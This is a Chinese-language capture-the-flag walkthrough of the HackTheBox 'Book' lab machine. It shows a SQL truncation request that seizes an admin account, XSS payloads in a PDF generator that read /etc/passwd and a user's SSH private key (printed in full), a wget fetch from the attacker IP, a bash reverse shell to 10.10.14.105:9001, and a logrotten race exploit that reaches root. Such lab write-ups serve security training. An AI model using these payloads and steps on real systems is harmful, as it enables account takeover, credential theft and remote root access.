Recon Nmap Scan [toc]Nmap显示没有开放太多端口,全端口扫描结果相同,共开放22和80两个端口,故需要将重点放在80端口上。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 # Nmap 7.80 scan initiated Tue May 19 21:52:32 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.176 Nmap scan report for 10.10.10.176 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA) | 256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA) |_ 256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: LIBRARY - Read | Learn | Have Fun Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue May 19 21:52:52 2020 -- 1 IP address (1 host up) scanned in 20.07 seconds
访问Web后,在Web源码中发现不寻常的函数validateForm,其中硬性规定了用户名和邮箱的长度。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <!DOCTYPE html> ... function validateForm() { var x = document.forms["myForm"]["name"].value; var y = document.forms["myForm"]["email"].value; if (x == "") { alert("Please fill name field. Should not be more than 10 characters"); return false; } if (y == "") { alert("Please fill email field. Should not be more than 20 characters"); return false; } } ...
使用Web目录爆破后发现存在管理后台 admin
,需要认证后的账户才可登录。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 /download.php (Status: 302) /index.php (Status: 200) /search.php (Status: 302) /contact.php (Status: 302) /home.php (Status: 302) /images (Status: 301) /profile.php (Status: 302) /docs (Status: 301) /books.php (Status: 302) /feedback.php (Status: 302) /admin (Status: 301) /db.php (Status: 200) /logout.php (Status: 302) /collections.php (Status: 302) /settings.php (Status: 302)
SQL Truncate 在我们随机注册一个用户,并登录后,发现该网站的管理员账户名称为admin@book.htb
。 结合前面的发现的有趣代码,以及这篇文章Link Here 我们发现可以通过这种方式,强制设定任意账户的密码。 将注册请求用Burpsuit截断,更改成以下形式,发送后获得响应302。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 POST / HTTP/1.1 Host: 10.10.10.176 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.10.10.176/ Content-Type: application/x-www-form-urlencoded Content-Length: 65 Connection: close Cookie: PHPSESSID=mr0i5e44ek6brbngn06gbefb72 Upgrade-Insecure-Requests: 1 name=admin a&email=admin%40book.htb dc03&password=admin
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 HTTP/1.1 302 Found Date: Fri, 22 May 2020 01:34:32 GMT Server: Apache/2.4.29 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: index.php Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
User.txt 使用admin@book.htb
和admin
登录用户页面和管理面板。 发现在http://book.htb/collections.php
中上传的内容, 可以早http://book.htb/admin/collections.php
中通过下载collections
看到。 结合这篇文章 了解到可以使用XSS生成PDF读取文件。 首先读取passwd,查看有哪些用户。
1 <script>x=new XMLHttpRequest ;x.onload =function ( ){document .write (this .responseText )};x.open ("GET" ,"file:///etc/passwd" );x.send ();
下载pdf后得到结果如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www- data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd- network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd- resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin reader:x:1000:1000:reader:/home/reader:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
发现用户reader
,尝试读取用户目录下的ssh key
1 <script>x=new XMLHttpRequest ;x.onload =function ( ){document .write (this .responseText )};x.open ("GET" ,"file:///home/reader/.ssh/id_rsa" );x.send ();</script>
下载pdf后得到rsa key
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA2JJQsccK6fE05OWbVGOuKZdf0FyicoUrrm821nHygmLgWSpJ G8m6UNZyRGj77eeYGe/7YIQYPATNLSOpQIue3knhDiEsfR99rMg7FRnVCpiHPpJ0 WxtCK0VlQUwxZ6953D16uxlRH8LXeI6BNAIjF0Z7zgkzRhTYJpKs6M80NdjUCl/0 ePV8RKoYVWuVRb4nFG1Es0bOj29lu64yWd/j3xWXHgpaJciHKxeNlr8x6NgbPv4s 7WaZQ4cjd+yzpOCJw9J91Vi33gv6+KCIzr+TEfzI82+hLW1UGx/13fh20cZXA6PK 75I5d5Holg7ME40BU06Eq0E3EOY6whCPlzndVwIDAQABAoIBAQCs+kh7hihAbIi7 3mxvPeKok6BSsvqJD7aw72FUbNSusbzRWwXjrP8ke/Pukg/OmDETXmtgToFwxsD+ McKIrDvq/gVEnNiE47ckXxVZqDVR7jvvjVhkQGRcXWQfgHThhPWHJI+3iuQRwzUI tIGcAaz3dTODgDO04Qc33+U9WeowqpOaqg9rWn00vgzOIjDgeGnbzr9ERdiuX6WJ jhPHFI7usIxmgX8Q2/nx3LSUNeZ2vHK5PMxiyJSQLiCbTBI/DurhMelbFX50/owz 7Qd2hMSr7qJVdfCQjkmE3x/L37YQEnQph6lcPzvVGOEGQzkuu4ljFkYz6sZ8GMx6 GZYD7sW5AoGBAO89fhOZC8osdYwOAISAk1vjmW9ZSPLYsmTmk3A7jOwke0o8/4FL E2vk2W5a9R6N5bEb9yvSt378snyrZGWpaIOWJADu+9xpZScZZ9imHHZiPlSNbc8/ ciqzwDZfSg5QLoe8CV/7sL2nKBRYBQVL6D8SBRPTIR+J/wHRtKt5PkxjAoGBAOe+ SRM/Abh5xub6zThrkIRnFgcYEf5CmVJX9IgPnwgWPHGcwUjKEH5pwpei6Sv8et7l skGl3dh4M/2Tgl/gYPwUKI4ori5OMRWykGANbLAt+Diz9mA3FQIi26ickgD2fv+V o5GVjWTOlfEj74k8hC6GjzWHna0pSlBEiAEF6Xt9AoGAZCDjdIZYhdxHsj9l/g7m Hc5LOGww+NqzB0HtsUprN6YpJ7AR6+YlEcItMl/FOW2AFbkzoNbHT9GpTj5ZfacC hBhBp1ZeeShvWobqjKUxQmbp2W975wKR4MdsihUlpInwf4S2k8J+fVHJl4IjT80u Pb9n+p0hvtZ9sSA4so/DACsCgYEA1y1ERO6X9mZ8XTQ7IUwfIBFnzqZ27pOAMYkh sMRwcd3TudpHTgLxVa91076cqw8AN78nyPTuDHVwMN+qisOYyfcdwQHc2XoY8YCf tdBBP0Uv2dafya7bfuRG+USH/QTj3wVen2sxoox/hSxM2iyqv1iJ2LZXndVc/zLi 5bBLnzECgYEAlLiYGzP92qdmlKLLWS7nPM0YzhbN9q0qC3ztk/+1v8pjj162pnlW y1K/LbqIV3C01ruxVBOV7ivUYrRkxR/u5QbS3WxOnK0FYjlS7UUAc4r0zMfWT9TN nkeaf9obYKsrORVuKKVNFzrWeXcVx+oG3NisSABIprhDfKUSbHzLIR4= -----END RSA PRIVATE KEY-----
使用key登录reader
,获得user.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ~/Documents/HTB/Book root@kali ❯ ssh reader@10.10.10.176 -i reader_rsa Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Fri May 22 02:10:06 UTC 2020 System load: 0.36 Processes: 269 Usage of /: 28.5% of 19.56GB Users logged in : 1 Memory usage: 39% IP address for ens33: 10.10.10.176 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 114 packages can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu May 21 18:26:15 2020 from 10.10.14.59 reader@book:~$ cat user.txt 51c1d4b5197fa30e3e5d37f8778f95bc reader@book:~$
Privilege Escalation 执行Linpeas.sh
后,发现logrotten,查看它给出的链接,存在提权的可能。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [+] Writable log files (logrotten) [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation Writable: /home/reader/backups/access.log.1 Writable: /home/reader/backups/access.log.12 Writable: /home/reader/backups/access.log.4 Writable: /home/reader/backups/access.log.11 Writable: /home/reader/backups/access.log.9 Writable: /home/reader/backups/access.log.10 Writable: /home/reader/backups/access.log Writable: /home/reader/backups/access.log.6 Writable: /home/reader/backups/access.log.2 Writable: /home/reader/backups/access.log.5 Writable: /home/reader/backups/access.log.7 Writable: /home/reader/backups/access.log.8 Writable: /home/reader/backups/access.log.3
root.txt 将poc下载到目标机器后,使用gcc编译。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 reader@book:/dev/shm$ wget 10.10.14.105/logrotten.c --2020-05-22 02:19:58-- http://10.10.14.105/logrotten.c Connecting to 10.10.14.105:80... connected. HTTP request sent, awaiting response... 200 OK Length: 7342 (7.2K) [text/plain] Saving to: ‘logrotten.c’ logrotten.c 100%[=======================================================================================================================================>] 7.17K --.-KB/s in 0.04s 2020-05-22 02:19:59 (186 KB/s) - ‘logrotten.c’ saved [7342/7342] reader@book:/dev/shm$ ls linpeas.sh logrotten.c reader@book:/dev/shm$ gcc -o logrotten logrotten.c
将reverse shell写入到payload中
1 2 reader@book:/dev/shm$ cat payload bash -c 'bash -i >& /dev/tcp/10.10.14.105/9001 0>&1'
因为这个poc依赖于logrotten对目日志标重命名后出现的竞争条件,因此我们需要对日志进行大量写入。这里用命令生成10M大小的垃圾文件,准备将其导入至日志文件中。
1 dd if =/dev/zero of=zeroFile bs=1M count=10
之后我们允许脚本,将垃圾文件写入日志中。获得reverse shell。
Step 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 reader@book:/dev/shm$ ./logrotten -p ./payload /home/reader/backups/access.log Waiting for rotating /home/reader/backups/access.log... Renamed /home/reader/backups with /home/reader/backups2 and created symlink to /etc/bash_completion.d Waiting 1 seconds before writing payload... Done! reader@book:/dev/shm$ cd V -bash: cd : V: No such file or directory reader@book:/dev/shm$ cd /etc/bash_completion.d reader@book:/etc/bash_completion.d$ ls access.log access.log.1 apport_completion cloud-init git-prompt grub reader@book:/etc/bash_completion.d$ cat access.log reader@book:/etc/bash_completion.d$ cat access.log.1 bash -c 'bash -i >& /dev/tcp/10.10.14.105/9001 0>&1' reader@book:/etc/bash_completion.d$
Step 2 1 reader@book:/dev/shm$ cat zeroFile > /home/reader/backups/access.log
Step 3 1 2 3 4 5 6 7 8 9 10 11 ~/Documents/HTB/Book root@kali 12s ❯ nc -nlvp 9001 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.176. Ncat: Connection from 10.10.10.176:43408. root@book:~ cat root.txt84da92adf998a1c7231297f70dd89714 root@book:~